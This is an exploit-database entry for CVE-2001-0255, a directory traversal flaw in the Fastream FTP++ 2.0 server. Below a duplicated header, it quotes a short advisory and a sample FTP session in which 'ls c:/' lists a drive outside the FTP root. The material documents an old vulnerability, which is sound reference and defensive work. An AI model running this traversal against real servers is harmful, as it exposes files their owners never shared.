fastream ftp++ 2.0 - Directory Traversal
| EKU-ID: 26132 | CVE: CVE-2001-0255;OSVDB-12103 | OSVDB-ID: |
| Author: SNS Research | Published: 2001-01-22 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 26132 | CVE: CVE-2001-0255;OSVDB-12103 | OSVDB-ID: |
| Author: SNS Research | Published: 2001-01-22 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/2267/info It is possible for a remote uesr to gain read permissions outside of the Faststream FTP++ Server directory. By requesting an 'ls' command along with the drive name, Fastream FTP++ will disclose the contents of the requested drive. ftp> pwd 257 "/C:/FTPROOT/" is current directory. ftp> ls c:/ 200 Port command successful. 150 Opening data connection for directory list. (listing of c:\)